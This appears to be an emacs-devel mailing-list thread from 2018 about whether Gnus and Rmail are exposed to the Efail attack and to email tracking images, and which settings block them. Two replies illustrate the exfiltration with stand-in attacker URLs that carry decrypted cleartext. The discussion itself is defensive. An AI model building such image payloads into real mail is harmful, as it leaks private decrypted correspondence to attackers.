Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 504 bytes --]


Hi

Currently there is a ongoing discussion on
gmane.comp.encryption.gpg.user
about the vulnerability of smime/pgp.
Which was published in 
https://efail.de/efail-attack-paper.pdf


I am using, besides gnupg,  s/mime in GNU emacs with gnus, using gpgsm
and epg.

Now in the documented listed above mutt is listed, which is text based,
as being vulnerable.


So I am wondering: am I save with the above setting, maybe I should
check my html settings in gnus?

Regards

Uwe Brauer 

[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> So I am wondering: am I save with the above setting, maybe I should
> check my html settings in gnus?

Gnus doesn't load external resources when reading mail (by default).

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 383 bytes --]

>>> "Lars" == Lars Ingebrigtsen <larsi@gnus.org> writes:

   > Uwe Brauer <oub@mat.ucm.es> writes:
   >> So I am wondering: am I save with the above setting, maybe I should
   >> check my html settings in gnus?

   > Gnus doesn't load external resources when reading mail (by default).

Just in case I change the default setting and don't remember, which
setting do I have to check?

[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> Just in case I change the default setting and don't remember, which
> setting do I have to check?

`gnus-blocked-images'.

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

If you allow a mail user agent to render HTML for you, you expose
yourself to various kinds of surveillance and swindles.  Now, it seems,
one of those might be a decryption exploit.

Does the exploit depend on Javascript code that the MUI will execute?

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 1346 bytes --]

>>> "Lars" == Lars Ingebrigtsen <larsi@gnus.org> writes:

   > Uwe Brauer <oub@mat.ucm.es> writes:
   >> Just in case I change the default setting and don't remember, which
   >> setting do I have to check?

   > `gnus-blocked-images'.

Oh. Thanks


The point is that sometimes I receive email containing mathematical
formula in png format, which are displayed. So I checked and I have

,----
| gnus-blocked-images is a variable defined in ‘gnus-art.el’.
| Its value is nil
| Original value was 
| gnus-block-private-groups
| 
| Documentation:
| Images that have URLs matching this regexp will be blocked.
| This can also be a function to be evaluated.  If so, it will be
| called with the group name as the parameter, and should return a
| regexp.
| 
| You can customize this variable.
| 
| This variable was introduced, or its default value was changed, in
| version 24.1 of Emacs.
`----

Do I understand that in this case I am vulnerable?

Hm I could write a function which sets the variable to non nil, when a
smime/pgp signed/encrypted message arrives. But maybe setting this
variable when opening the message is too late to avoid the
vulnerability.

So maybe it is safer to return to the original setting and set it to
nil, if I am sure the message is *not* encrypted/signed.

Any opinions?


[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 754 bytes --]

>>> "Richard" == Richard Stallman <rms@gnu.org> writes:

   > [[[ To any NSA and FBI agents reading my email: please consider    ]]]
   > [[[ whether defending the US Constitution against all enemies,     ]]]
   > [[[ foreign or domestic, requires you to follow Snowden's example. ]]]

   > If you allow a mail user agent to render HTML for you, you expose
   > yourself to various kinds of surveillance and swindles.  Now, it seems,
   > one of those might be a decryption exploit.

   > Does the exploit depend on Javascript code that the MUI will execute?

Not sure, will ask in the gnupg list. Would be a sort of irony if the
only save email reader (avoiding this sort of attack) were GNU Emacs
+gnus/rmail/vm.

Snowden should have told us this. :-D

[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 722 bytes --]

>>> "Lars" == Lars Ingebrigtsen <larsi@gnus.org> writes:

   > Uwe Brauer <oub@mat.ucm.es> writes:
   >> Just in case I change the default setting and don't remember, which
   >> setting do I have to check?

   > `gnus-blocked-images'.

Ok I changed the variable to
Its value is ‘gnus-block-private-groups’

Still the math png are displayed. My setting is

(setq gnus-mime-display-multipart-alternative-as-mixed nil) ; most important
(setq gnus-mime-display-multipart-related-as-mixed nil)
(setq gnus-mime-display-multipart-as-mixed nil)  
(setq mm-discouraged-alternatives '("text/html")) ;standard setting for quotes in gmail
(setq mm-text-html-renderer 'shr) 


So am I save with this setting?

[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Richard Stallman <rms@gnu.org> writes:

> Does the exploit depend on Javascript code that the MUI will execute?

No, it just depends in <img src="http://attacker.org/" in various
scenarios (either embedded at the start of the PGP-encrypted message
itself (which is possible due to certain deficiencies in the format)),
or due to mishandling by certain mail user agents of multipart/mixed,
where it would concatenate various parts before parsing the resulting
mess as one HTML message.

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> The point is that sometimes I receive email containing mathematical
> formula in png format, which are displayed. So I checked and I have
>
> ,----
> | gnus-blocked-images is a variable defined in ‘gnus-art.el’.
> | Its value is nil

[...]

> Do I understand that in this case I am vulnerable?

Yes.

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> Ok I changed the variable to
> Its value is ‘gnus-block-private-groups’
>
> Still the math png are displayed. My setting is

Are you sure the math pngs are external and not embedded in a
multipart/related message?

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Lars Ingebrigtsen <larsi@gnus.org> writes:

> Uwe Brauer <oub@mat.ucm.es> writes:
>
>> The point is that sometimes I receive email containing mathematical
>> formula in png format, which are displayed. So I checked and I have
>>
>> ,----
>> | gnus-blocked-images is a variable defined in ‘gnus-art.el’.
>> | Its value is nil
>
> [...]
>
>> Do I understand that in this case I am vulnerable?
>
> Yes.

That is, if you load external resources, you've vulnerable to
information leakage, and people will track whether you've read their
emails and stuff.

You're not vulnerable to the first form of the S/MIME attack, because
Gnus isn't insane, but you are somewhat vulnerable to the second form
(the one that involves mangling the encrypted PGP payload itself).

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 485 bytes --]

>>> "Lars" == Lars Ingebrigtsen <larsi@gnus.org> writes:

   > Uwe Brauer <oub@mat.ucm.es> writes:
   >> Ok I changed the variable to
   >> Its value is ‘gnus-block-private-groups’
   >> 
   >> Still the math png are displayed. My setting is

   > Are you sure the math pngs are external and not embedded in a
   > multipart/related message?

They are embedded (here is an example), the question is with changing
the setting to gnus-block-private-groups, am I safe?

$\int f dx =0$

[-- Attachment #2.1: Type: text/html, Size: 911 bytes --]

[-- Attachment #2.2: latexFbmQXu_d94ea252fd8bd93e8c52f72d99813efe11eae0ca.png --]
[-- Type: image/png, Size: 550 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> They are embedded (here is an example), the question is with changing
> the setting to gnus-block-private-groups, am I safe?

Yes, you're safe when reading email.

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Eli Zaretskii]

> From: Richard Stallman <rms@gnu.org>
> Date: Tue, 15 May 2018 22:52:38 -0400
> Cc: emacs-devel@gnu.org
> 
> If you allow a mail user agent to render HTML for you, you expose
> yourself to various kinds of surveillance and swindles.

I don't think HTML rendering per se is the problem.  The problem is
when the MUA automatically fetches stuff referenced in the email as a
URL pointing to some server.

As long as the MUA renders HTML that is only contained in the mail
message, there's no leak of private information outside of the MUA.
At least that's my understanding of the paper which was cited here.

E.g., Rmail renders HTML messages, but doesn't access external URL
references, it creates a button out of each reference that the user
needs to activate to cause Emacs to fetch the URL.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Andreas Schwab]

On Mai 16 2018, Eli Zaretskii <eliz@gnu.org> wrote:

> E.g., Rmail renders HTML messages, but doesn't access external URL
> references, it creates a button out of each reference that the user
> needs to activate to cause Emacs to fetch the URL.

There is a difference between anchors that form links to other pages,
and elements like images that are part of the contents, but use external
references (instead of using data that is part of the message).  In
order to render the latter the external reference must be fetched.

Andreas.

-- 
Andreas Schwab, schwab@linux-m68k.org
GPG Key fingerprint = 7578 EB47 D4E5 4D69 2510  2552 DF73 E780 A9DA AEC1
"And now for something completely different."

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Eli Zaretskii]

> From: Andreas Schwab <schwab@linux-m68k.org>
> Cc: rms@gnu.org,  oub@mat.ucm.es,  emacs-devel@gnu.org
> Date: Wed, 16 May 2018 19:15:09 +0200
> 
> On Mai 16 2018, Eli Zaretskii <eliz@gnu.org> wrote:
> 
> > E.g., Rmail renders HTML messages, but doesn't access external URL
> > references, it creates a button out of each reference that the user
> > needs to activate to cause Emacs to fetch the URL.
> 
> There is a difference between anchors that form links to other pages,
> and elements like images that are part of the contents, but use external
> references (instead of using data that is part of the message).  In
> order to render the latter the external reference must be fetched.

I agree that there's a difference, but a good MUA should treat them
the same, and only download images after the user confirms.

(And private/secret correspondence shouldn't include such external
references in the first place, IMHO.)

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Andreas Schwab]

On Mai 16 2018, Eli Zaretskii <eliz@gnu.org> wrote:

>> From: Andreas Schwab <schwab@linux-m68k.org>
>> Cc: rms@gnu.org,  oub@mat.ucm.es,  emacs-devel@gnu.org
>> Date: Wed, 16 May 2018 19:15:09 +0200
>> 
>> On Mai 16 2018, Eli Zaretskii <eliz@gnu.org> wrote:
>> 
>> > E.g., Rmail renders HTML messages, but doesn't access external URL
>> > references, it creates a button out of each reference that the user
>> > needs to activate to cause Emacs to fetch the URL.
>> 
>> There is a difference between anchors that form links to other pages,
>> and elements like images that are part of the contents, but use external
>> references (instead of using data that is part of the message).  In
>> order to render the latter the external reference must be fetched.
>
> I agree that there's a difference, but a good MUA should treat them
> the same, and only download images after the user confirms.

There are other elements like style sheets that are needed for rendering
the whole message.  The point is that the rendering engine needs to
support such security measures in the first place.

> (And private/secret correspondence shouldn't include such external
> references in the first place, IMHO.)

Sadly, most people don't care enough.

Andreas.

-- 
Andreas Schwab, schwab@linux-m68k.org
GPG Key fingerprint = 7578 EB47 D4E5 4D69 2510  2552 DF73 E780 A9DA AEC1
"And now for something completely different."

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Joost Kremers]

On Wed, May 16 2018, Eli Zaretskii wrote:
> (And private/secret correspondence shouldn't include such 
> external
> references in the first place, IMHO.)

Sure, but if I understand EFAIL correctly, it's not about you or 
your interlocutor including external references into encrypted 
emails. It's about an attacker sending you a carefully crafted 
malicious email that contains the encrypted version of another 
email that you once sent or received and which the attacker got a 
hold of (e.g., by gaining access to your ISP's mail server, or by 
intercepting it while in transit, or whatever). It's this 
malicious email that contains external references, not your 
original email that the attacker is trying to decrypt.

At least, that's my limited understanding of the issue...



-- 
Joost Kremers
Life has its moments

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > No, it just depends in <img src="http://attacker.org/" in various
  > scenarios

How does that command cause some of the message to be sent somewhere?

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > I don't think HTML rendering per se is the problem.  The problem is
  > when the MUA automatically fetches stuff referenced in the email as a
  > URL pointing to some server.

Indeed, that's what does it -- but this is a part of HTML rendering,
isn't it?

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > There is a difference between anchors that form links to other pages,
  > and elements like images that are part of the contents, but use external
  > references (instead of using data that is part of the message).  In
  > order to render the latter the external reference must be fetched.

That's true, in order to render the HTML "correctly".

It follows that, to protect the user from various kinds of malicious
image references, the mail client should render the HTML
"incorrectly", omitting those images unless the user says to show them.

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Robert Pluim]

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>   > No, it just depends in <img src="http://attacker.org/" in various
>   > scenarios
>
> How does that command cause some of the message to be sent somewhere?

The attacker arranges things so that the requested URL actually
contains the cleartext eg
<https://attacker.org?super_secret_message_cleartext>

Robert

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Eli Zaretskii]

> From: Richard Stallman <rms@gnu.org>
> CC: oub@mat.ucm.es, emacs-devel@gnu.org
> Date: Wed, 16 May 2018 23:05:24 -0400
> 
>   > I don't think HTML rendering per se is the problem.  The problem is
>   > when the MUA automatically fetches stuff referenced in the email as a
>   > URL pointing to some server.
> 
> Indeed, that's what does it -- but this is a part of HTML rendering,
> isn't it?

Not a necessary part, no.  E.g., Rmail invokes shr.el to render an
HTML body while disabling image loading, and since shr.el doesn't
support CSS, it doesn't fetch CSS, either.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > There are other elements like style sheets that are needed for rendering
  > the whole message.  The point is that the rendering engine needs to
  > support such security measures in the first place.

Yes, that is right.

Referring to any external elements from HTML in an email
exposes the user to various forms of mistreatment.
Security in an MUA includes protecting the user from all that.

  > > (And private/secret correspondence shouldn't include such external
  > > references in the first place, IMHO.)

  > Sadly, most people don't care enough.

It's often not "people".  Many companies systematically use this
security hole to track users.  I am very glad that nobody can
tell whether I have read a message -- because I do it in Emacs.


-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > >   > I don't think HTML rendering per se is the problem.  The problem is
  > >   > when the MUA automatically fetches stuff referenced in the email as a
  > >   > URL pointing to some server.
  > > 
  > > Indeed, that's what does it -- but this is a part of HTML rendering,
  > > isn't it?

  > Not a necessary part, no.  E.g., Rmail invokes shr.el to render an
  > HTML body while disabling image loading, and since shr.el doesn't
  > support CSS, it doesn't fetch CSS, either.

We are miscommunicating.  What I meant is that this operation, if and
when it is done, is part of HTML rendering.  I am sorry I didn't make
that clear.


-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 1311 bytes --]


   > [[[ To any NSA and FBI agents reading my email: please consider    ]]]
   > [[[ whether defending the US Constitution against all enemies,     ]]]
   > [[[ foreign or domestic, requires you to follow Snowden's example. ]]]


   > Yes, that is right.

   > Referring to any external elements from HTML in an email
   > exposes the user to various forms of mistreatment.
   > Security in an MUA includes protecting the user from all that.



   > It's often not "people".  Many companies systematically use this
   > security hole to track users.  I am very glad that nobody can
   > tell whether I have read a message -- because I do it in Emacs.

A word of warning should be added.

There are configuration in emacs, for which  such a tracking is
successful.

For example using gnus the setting

(setq gnus-blocked-images nil)



Explanation.

I was not aware of this sort of tracking software and found out that
google's chrome browser has dozen of extension for email tracking, some
of them commercial. I downloaded and tried all of them, (well the ones
which did not require a payment). I then sent message to my own account
(my university switched to a google account which I access via imap).

Indeed with the above setting one extension successfully discovered that
I read an email with gnus/emacs.

[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> For example using gnus the setting
>
> (setq gnus-blocked-images nil)
>
> Explanation.
>
> I was not aware of this sort of tracking software

I've now added an entire essay to the doc string of that variable
explaining the privacy implications.

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 690 bytes --]

>>> "Lars" == Lars Ingebrigtsen <larsi@gnus.org> writes:

   > Uwe Brauer <oub@mat.ucm.es> writes:
   >> For example using gnus the setting
   >> 
   >> (setq gnus-blocked-images nil)
   >> 
   >> Explanation.
   >> 
   >> I was not aware of this sort of tracking software

   > I've now added an entire essay to the doc string of that variable
   > explaining the privacy implications.

Hm I just pulled the latest gnu emacs master and the doc string still
reads :-D 

"Images that have URLs matching this regexp will be blocked.
This can also be a function to be evaluated.  If so, it will be
called with the group name as the parameter, and should return a
regexp."

[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Eli Zaretskii]

> From: Uwe Brauer <oub@mat.ucm.es>
> Date: Sat, 19 May 2018 10:29:32 +0200
> 
>    > I've now added an entire essay to the doc string of that variable
>    > explaining the privacy implications.
> 
> Hm I just pulled the latest gnu emacs master and the doc string still
> reads :-D 
> 
> "Images that have URLs matching this regexp will be blocked.
> This can also be a function to be evaluated.  If so, it will be
> called with the group name as the parameter, and should return a
> regexp."

Wither your build after pulling failed or was incomplete, or the way
you displayed the doc string is wrong.

Don't you see the new text in gnus-art.el?

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 500 bytes --]



   > Wither your build after pulling failed or was incomplete, or the way
   > you displayed the doc string is wrong.

I just run

git pull

I did not compile or install. I just went to
lisp/gnus/gnus-art.el

I tried  run

git pull

again, found out there was an error. after a couple of intents it
finally worked, now I can see the new string.

So most likely my pull an hour ago, was not complete. (Which reminds me
how much I dislike git, a pity that git was preferred over
mercurial...... :'(


[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Uwe Brauer <oub@mat.ucm.es> writes:

> Hm I just pulled the latest gnu emacs master and the doc string still
> reads :-D 

Doesn't sound like you're pulling from the official git tree?

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > For example using gnus the setting

  > (setq gnus-blocked-images nil)

The default value is gnus-block-private-groups, whose doc string
says

    (defun gnus-block-private-groups (group)
      "Allows images in newsgroups to be shown, blocks images in all
    other groups."

Does that create a vulnerability in some cases?  Can newsgroup
postings use an image to determine who reads them?

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > I've now added an entire essay to the doc string of that variable
  > explaining the privacy implications.

+100!

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Uwe Brauer]

[-- Attachment #1: Type: text/plain, Size: 1423 bytes --]

>>> "Richard" == Richard Stallman <rms@gnu.org> writes:

   > [[[ To any NSA and FBI agents reading my email: please consider    ]]]
   > [[[ whether defending the US Constitution against all enemies,     ]]]
   > [[[ foreign or domestic, requires you to follow Snowden's example. ]]]

   >> For example using gnus the setting

   >> (setq gnus-blocked-images nil)

   > The default value is gnus-block-private-groups, whose doc string
   > says

   >     (defun gnus-block-private-groups (group)
   >       "Allows images in newsgroups to be shown, blocks images in all
   >     other groups."

   > Does that create a vulnerability in some cases?  Can newsgroup
   > postings use an image to determine who reads them?

All I can say: I set the variable to nil, I use chrome with the tracker
email extension, send a message to myself, opening it with emacs/gnus
and the chrome extension software tells me that I have opened it.

If the variable is set as it should be, the tracking software does not
detect that I have opened it.


Slightly off topic, there is software which warns you about tracked
emails or even tries to block them. However that blocking then causes
the tracking software to consider it as opened, although it was not
really opened :-D [1] and which really defeats the whole idea of
tracking, but this is another topic.

Footnotes:
[1]  (I made this experiment  with someone who posses this software)


[-- Attachment #2: smime.p7s --]
[-- Type: application/pkcs7-signature, Size: 5025 bytes --]

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Richard Stallman <rms@gnu.org> writes:

> Does that create a vulnerability in some cases?  Can newsgroup
> postings use an image to determine who reads them?

Yes and no.

If you consider emails, the possibility of tracking there is pernicious
because the person who sent the email knows that they sent that email to
you, and when they get a pingback when you read that email, they'll know
with pretty high probability that you've read that email.  Which is why
loading external resources when reading email is bad (even if many email
readers default to this behaviour).

When you're reading a newsgroup, you're reading a public resource.
Anybody can read it, so the only thing the person who controls the
external resources can determine is that somebody (at a certain IP
address) read the message.  It's the same situation as if you read a web
page -- somebody'll know you did it, but not who you are (beyond the IP
address).

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

   >> (setq gnus-blocked-images nil)

  > All I can say: I set the variable to nil, I use chrome with the tracker
  > email extension, send a message to myself, opening it with emacs/gnus
  > and the chrome extension software tells me that I have opened it.

  > If the variable is set as it should be, the tracking software does not
  > detect that I have opened it.

Thank you.  Your evidence shows that this DOES create a vulnerability.

Someone reported adding an explanation of this to the doc string of
gnus-blocked-images.  Does it warn about the vulnerability adequately now?

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Richard Stallman]

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

  > When you're reading a newsgroup, you're reading a public resource.
  > Anybody can read it, so the only thing the person who controls the
  > external resources can determine is that somebody (at a certain IP
  > address) read the message.

Finding out your IP address is indeed snooping, unless you change it
frequently.  I think we should inform users of the snooping
consequence of this default.  People could the decide whether to
consider it acceptable.

Could you add that to the doc string?

-- 
Dr Richard Stallman
President, Free Software Foundation (https://gnu.org, https://fsf.org)
Internet Hall-of-Famer (https://internethalloffame.org)
Skype: No way! See https://stallman.org/skype.html.

Re: Emacs/Mutt and Efail or OpenPGP is safer than S/MIME?

[Lars Ingebrigtsen]

Richard Stallman <rms@gnu.org> writes:

>   > When you're reading a newsgroup, you're reading a public resource.
>   > Anybody can read it, so the only thing the person who controls the
>   > external resources can determine is that somebody (at a certain IP
>   > address) read the message.
>
> Finding out your IP address is indeed snooping, unless you change it
> frequently.  I think we should inform users of the snooping
> consequence of this default.  People could the decide whether to
> consider it acceptable.
>
> Could you add that to the doc string?

I've now done so.

-- 
(domestic pets only, the antidote for overdose, milk.)
   bloggy blog: http://lars.ingebrigtsen.no